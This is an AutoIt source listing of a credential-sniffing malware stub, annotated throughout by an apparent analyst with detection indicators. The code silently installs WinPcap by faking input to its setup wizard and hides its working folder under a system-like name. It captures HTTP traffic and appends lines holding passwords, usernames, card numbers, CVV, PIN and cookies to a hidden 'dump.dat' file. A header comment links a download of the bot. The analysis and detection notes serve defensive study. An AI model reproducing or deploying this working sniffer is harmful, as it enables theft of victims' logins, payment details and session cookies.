; MAIN STUB HERE https://anonfiles.com/Pbn1G269q0/bot_au3
;
; Analyst summary (everything below is read off this listing, nothing was executed):
;   * AutoIt script compiled to "stub.exe" with UPX packing and no tray icon.
;   * Enforces a single instance through a named kernel object (see _Singleton).
;   * If wpcap.dll is missing from the system directory, downloads the WinPcap 4.1.3
;     installer to the temp directory and drives its setup wizard with synthetic input.
;   * Creates a hidden+system directory "Windows Shell Common Binary" under the
;     per-user application-data directory and appends to "dump.dat" inside it.
;   * Captures TCP traffic on ports 80/8080/8888/8181 for the first enumerated
;     adapter and writes payload lines containing credential, payment or
;     cookie-related keywords to that file.
; Observable artefacts for detection and triage: the directory and file names above,
; the WinPcap installer appearing in the temp directory, an unexpected process loading
; wpcap.dll / packet.dll, and the semaphore name built from the hex constant below.
; The remaining functions are a WinPcap wrapper library inlined into the script.
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=stub.exe
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_UseUpx=y
#AutoIt3Wrapper_Res_Language=1033
#AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
#AutoIt3Wrapper_Run_Tidy=y
#Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
#AutoIt3Wrapper_Tidy_Stop_OnError=n
#AutoIt3Wrapper_Run_Au3Stripper=y
#Au3Stripper_Parameters=/so /mi 5 /mo
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
Opt("ExpandEnvStrings", 1)
; Working directory and output file; both names are host-based indicators.
Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
Global $lootLoc = $installdir & "\dump.dat"
; BPF expression fragment: only TCP traffic on these four ports is captured.
Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
; Name of the single-instance object; the bytes are passed through BinaryToString unchanged.
Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
; With the default $flag = 0 the script exits with code -1 if the object already exists.
_Singleton($sMutex)
; WinPcap bootstrap: runs only when wpcap.dll is absent from the system directory.
; The installer is fetched from winpcap.org and its wizard pages are advanced with
; Alt-key accelerators and one button click, so setup windows appear on the desktop.
If Not FileExists(@SystemDir & "\wpcap.dll") Then
    InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
    Run(@TempDir & "\WinPcap_4_1_3.exe")
    WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
    Send("!n")
    WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
    Send("!a")
    WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
    ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
    WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
    Send("!f")
EndIf
; Despite its name this only creates the working directory and marks it hidden+system.
installPCAP()
$winpcap = _PcapSetup()
$pcap_devices = _PcapGetDeviceList()
; Always the first adapter returned by the enumeration.
$iface = 0
; Filter becomes "host <column 7 of the device row> and <$sniffopt>"; column 7 is where
; _PcapGetDeviceList stores the adapter's short (IPv4-length) address.
; Arguments: non-promiscuous, 65536-byte snap length, 2^24-byte buffer, realtime off.
$pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
; Substrings searched for in captured payload text: HTTP request lines and headers,
; credential form fields, payment-card fields and the Cookie header.
Dim $keywords[20]
$keywords[0] = "GET /"
$keywords[1] = "POST /"
$keywords[2] = "Host: "
$keywords[3] = "User-Agent: "
$keywords[4] = "Content-"
$keywords[5] = "password="
$keywords[6] = "user_name="
$keywords[7] = "user="
$keywords[8] = "Username="
$keywords[9] = "User="
$keywords[10] = "login="
$keywords[11] = "email="
$keywords[12] = "username="
$keywords[13] = "holder="
$keywords[14] = "number="
$keywords[15] = "cvv="
$keywords[16] = "pin="
$keywords[17] = "transaction"
$keywords[18] = "bank"
$keywords[19] = "Cookie: "
; Mode 1 opens the output file for appending.
$lootHandle = FileOpen($lootLoc, 1)
$sPacketText = ""
$oldPacketText = ""
; Capture loop: runs until the process is terminated.
While True
    $aPacket = _TCP_Recv($pcap)
    ; _TCP_Recv returns a 21-element array on success and -1 on timeout.
    If UBound($aPacket) > 20 Then
        ; Element 20 is the hex text following the fixed-size headers, decoded to a string here.
        $sPacketText = BinaryToString("0x" & $aPacket[20])
        ; Skip a payload identical to the previous one.
        If $sPacketText = $oldPacketText Then
            Sleep(250)
            ContinueLoop
        EndIf
        If StringLen($sPacketText) > 13 Then
            For $key = 0 To UBound($keywords) - 1
                If StringInStr($sPacketText, $keywords[$key]) Then
                    ; Compares a value derived from the destination-port field with 6667.
                    ; NOTE(review): the exact result of this conversion chain was not verified,
                    ; and the capture filter admits only ports 80/8080/8888/8181.
                    If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
                    ; Split the payload into lines (CR removed, split on LF) and append every
                    ; line containing the current keyword to the output file.
                    $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
                    For $aPT = 1 To UBound($aPacketText) - 1
                        If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
                            FileWriteLine($lootHandle, $aPacketText[$aPT])
                            FileFlush($lootHandle)
                            $oldPacketText = $sPacketText
                        EndIf
                    Next
                    $oldPacketText = $sPacketText
                Else
                    ; Non-matching keyword: the whole payload is written to the console stream.
                    ConsoleWrite($sPacketText & @CRLF)
                EndIf
            Next
        EndIf
    EndIf
    $oldPacketText = $sPacketText
WEnd

; Enumerates capture devices through pcap_findalldevs_ex("rpcap://").
; Returns -1 on DllCall error or when the call reports -1; otherwise a 2D array with one
; row per device and 14 columns:
;   [0] name, [1] description, [2..4] link type value / name / description,
;   [5] second field of the PacketGetNetType result (declared as "speed"), [6] MAC address,
;   [7..9] address / netmask / broadcast for short (7-15 character) address strings,
;   [10..12] the same three fields for longer address strings, [13] flags.
Func _PcapGetDeviceList()
    Local $alldevs = DllStructCreate("ptr")
    Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
    If (@error > 0) Then Return -1
    If $r[0] = -1 Then Return -1
    Local $next = DllStructGetData($alldevs, 1)
    Local $list[1][14]
    Local $i = 0
    ; Walk the linked list of device records returned by the library.
    While ($next <> 0)
        Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
        ; Name and description are C strings; measure them, then map a char[] over each pointer.
        Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
        Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
        $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
        $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
        Local $next_addr = DllStructGetData($pcap_if, "addresses")
        ; Drops the first 8 characters of the name, presumably the "rpcap://" prefix,
        ; before handing the adapter name to packet.dll.
        Local $device = StringTrimLeft($list[$i][0], 8)
        Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
        DllStructSetData($snames, 1, $device)
        Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
        If IsPtr($handle[0]) Then
            ; OID request 0x01010102 with a 6-byte buffer; the result is formatted as a MAC address.
            Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
            DllStructSetData($packetoiddata, 1, 0x01010102)
            DllStructSetData($packetoiddata, 2, 6)
            Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
            If $status[0] Then
                Local $mac = DllStructGetData($packetoiddata, 3)
                $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
            EndIf
            Local $nettype = DllStructCreate("uint type;uint64 speed")
            $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
            If $status[0] Then
                $list[$i][5] = DllStructGetData($nettype, 2)
            EndIf
            DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
        EndIf
        ; Briefly opens the device with a placeholder filter only to read its link type.
        Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
        If IsPtr($pcap) Then
            Local $types = _PcapGetLinkType($pcap)
            If IsArray($types) Then
                $list[$i][2] = $types[0]
                $list[$i][3] = $types[1]
                $list[$i][4] = $types[2]
            EndIf
            _PcapStopCapture($pcap)
        EndIf
        ; Walk this device's address list; fields 2..4 are addr, netmask and broadaddr.
        While $next_addr <> 0
            Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
            Local $j, $addr
            For $j = 2 To 4
                $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
                ; Strings longer than 15 characters go to columns 10..12, those longer
                ; than 6 to columns 7..9; anything shorter is ignored.
                If StringLen($addr) > 15 Then
                    $list[$i][$j + 8] = $addr
                ElseIf StringLen($addr) > 6 Then
                    $list[$i][$j + 5] = $addr
                EndIf
            Next
            $next_addr = DllStructGetData($pcap_addr, 1)
        WEnd
        $list[$i][13] = DllStructGetData($pcap_if, 5)
        $next = DllStructGetData($pcap_if, 1)
        $i += 1
        ; Grow the result by one row only when another device follows.
        If $next <> 0 Then ReDim $list[$i + 1][14]
    WEnd
    DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
    Return $list
EndFunc   ;==>_PcapGetDeviceList

; Returns -1 when $pcap is not a pointer; otherwise a 3-element array:
; [0] numeric data-link type, [1] its name, [2] its description.
Func _PcapGetLinkType($pcap)
    If Not IsPtr($pcap) Then Return -1
    Local $type[3]
    Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
    $type[0] = $t[0]
    Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
    $type[1] = $name[0]
    Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
    $type[2] = $desc[0]
    Return $type
EndFunc   ;==>_PcapGetLinkType

; Fetches one packet with pcap_next_ex.
; Returns 0 on timeout, -1 on error, -2 on end of file; on success an array with
; [0] = time string, [1] = captured length, [2] = packet length, [3] = packet data.
; Also returns -1 when $pcap is not a pointer.
Func _PcapGetPacket($pcap)
    If Not IsPtr($pcap) Then Return -1
    $Pcap_ptrhdr = DllStructCreate("ptr")
    $Pcap_ptrpkt = DllStructCreate("ptr")
    Local $pk[4]
    Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
    ; Any result other than 1 is passed straight back to the caller.
    If ($res[0] <> 1) Then Return $res[0]
    ; Map the packet header and a byte array of the captured length over the returned pointers.
    Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
    Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
    ; Seconds since midnight after applying the time-zone bias computed in _PcapSetup.
    Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
    $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
    $pk[1] = DllStructGetData($pkthdr, 3)
    $pk[2] = DllStructGetData($pkthdr, 4)
    $pk[3] = DllStructGetData($packet, 1)
    ; Running totals: bytes seen and packet count.
    $Pcap_statV += $pk[2]
    $Pcap_statN += 1
    Return $pk
EndFunc   ;==>_PcapGetPacket

; Sends $data (binary) through pcap_sendpacket and returns that call's result;
; returns -1 when $pcap is not a pointer. Nothing in this listing calls it.
Func _PcapSendPacket($pcap, $data)
    If Not IsPtr($pcap) Then Return -1
    Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
    DllStructSetData($databuffer, 1, $data)
    Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
    Return $r[0]
EndFunc   ;==>_PcapSendPacket

; Opens wpcap.dll from the system directory and initialises the library's globals.
; Returns the WinPcap version string, or -1 if the DLL is missing or the call fails.
Func _PcapSetup()
    If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
    Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
    Global $Pcap_errbuf = DllStructCreate("char[256]")
    Global $Pcap_ptrhdr = 0
    Global $Pcap_ptrpkt = 0
    Global $Pcap_statV ; Total volume captured
    Global $Pcap_statN ; Total number of packets captured
    Global $Pcap_starttime ; Start time of capture
    ; Time-zone offset in seconds, derived from the ActiveTimeBias registry value (minutes).
    Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
    Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
    If (@error > 0) Then Return -1
    Return $v[0]
EndFunc   ;==>_PcapSetup

; Converts a sockaddr pointer to text: dotted decimal for family 2, eight colon-separated
; groups of four hex digits for family 23, and "" for a null pointer or any other family.
Func _PcapSock2addr($sockaddr_ptr)
    If ($sockaddr_ptr = 0) Then Return ""
    Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
    Local $family = DllStructGetData($sockaddr, 1)
    If ($family = 2) Then
        Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
        Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
    EndIf
    If ($family = 23) Then
        Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
        Local $bin = DllStructGetData($sockaddr_in6, 4)
        Local $i, $ipv6
        ; $bin is read as "0x" followed by 32 hex digits; take four digits per group.
        For $i = 0 To 7
            $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
        Next
        Return StringTrimRight($ipv6, 1)
    EndIf
    Return ""
EndFunc   ;==>_PcapSock2addr

; Opens $DeviceName with pcap_open (1000 ms read timeout), switches the handle to
; non-blocking mode and optionally applies a BPF $filter, a kernel buffer size and
; the minimum-copy setting.
; Returns the capture handle, or -1 on any failure; a filter failure stores a
; "Filter: ..." message in $Pcap_errbuf and closes the handle first.
Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
    Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
    If (@error > 0) Then Return -1
    If ($handle[0] = 0) Then Return -1
    DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
    If ($filter <> "") Then
        Local $fcode = DllStructCreate("UINT;ptr")
        Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
        If ($comp[0] = -1) Then
            Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
            DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
            _PcapStopCapture($handle[0])
            Return -1
        EndIf
        Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
        If ($set[0] = -1) Then
            Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
            DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
            _PcapStopCapture($handle[0])
            Return -1
            ; The call below follows the Return, so it is never executed as written.
            DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
        EndIf
    EndIf
    If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
    If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
    ; Reset the capture statistics for the new session.
    $Pcap_statV = 0
    $Pcap_statN = 0
    $Pcap_starttime = TimerInit()
    Return $handle[0]
EndFunc   ;==>_PcapStartCapture

; Closes a capture handle with pcap_close; does nothing when $pcap is not a pointer.
Func _PcapStopCapture($pcap)
    If Not IsPtr($pcap) Then Return
    DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
EndFunc   ;==>_PcapStopCapture

; Single-instance guard built on a named semaphore (CreateSemaphore, not a mutex).
; If the name already exists: with $flag = 0 the script exits with code -1, otherwise
; @error is set to 183 and 0 is returned. On first creation returns the object handle.
Func _Singleton($occurenceName, $flag = 0)
    Local $ERROR_ALREADY_EXISTS = 183
    $occurenceName = StringReplace($occurenceName, "\", "") ; backslashes are removed from the name to avoid an error
    Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
    ; Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
    Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
    If $lastError[0] = $ERROR_ALREADY_EXISTS Then
        If $flag = 0 Then
            Exit -1
        Else
            SetError($lastError[0]) ; $flag <> 0, so report ERROR_ALREADY_EXISTS through @error
            Return 0
        EndIf
    EndIf
    Return $handle[0]
EndFunc   ;==>_Singleton

; Polls _PcapGetPacket until the packet with index $iInstance arrives or $iTimeOut
; milliseconds elapse ($iTimeOut = -1 waits indefinitely).
; Returns a 21-element array of hex-string fields sliced from the raw frame, or -1 on timeout.
; The offsets are fixed: they correspond to a 14-byte Ethernet header, a 20-byte IPv4
; header and a 20-byte TCP header; the code does not inspect the header-length fields.
Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
    Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
    $iTimer_Capture = TimerInit()
    While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
        $aPacket = _PcapGetPacket($hCapture)
        If IsArray($aPacket) Then
            If $iPacket = $iInstance Then
                ; $aPacket[3] is sliced as a "0x..." hex string, so positions start at 3.
                Local $aTCPPacket[21]
                $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ; Destination MAC address
                $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ; Source MAC address
                $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ; Type
                $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ; Version & header length
                $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ; Differentiated services field
                $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ; Total length
                $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ; Identification
                $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ; Fragment offset
                $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ; Time to live
                $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ; Protocol
                $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ; Header checksum
                $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ; Source IP address
                $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ; Destination IP address
                $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ; Source port
                $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ; Destination port
                $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ; Sequence number
                $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ; Acknowledgment number
                $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ; Flags
                $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ; Window size value
                $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ; Checksum
                $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ; Data: everything after "0x" plus 54 header bytes
                Return $aTCPPacket
            EndIf
            $iPacket += 1
        EndIf
    WEnd
    Return -1
EndFunc   ;==>_TCP_Recv

; Creates the working directory and sets its System and Hidden attributes, which hides
; it from a default Explorer view. No installation of WinPcap happens here.
Func installPCAP()
    DirCreate($installdir)
    FileSetAttrib($installdir, "+SH")
EndFunc   ;==>installPCAP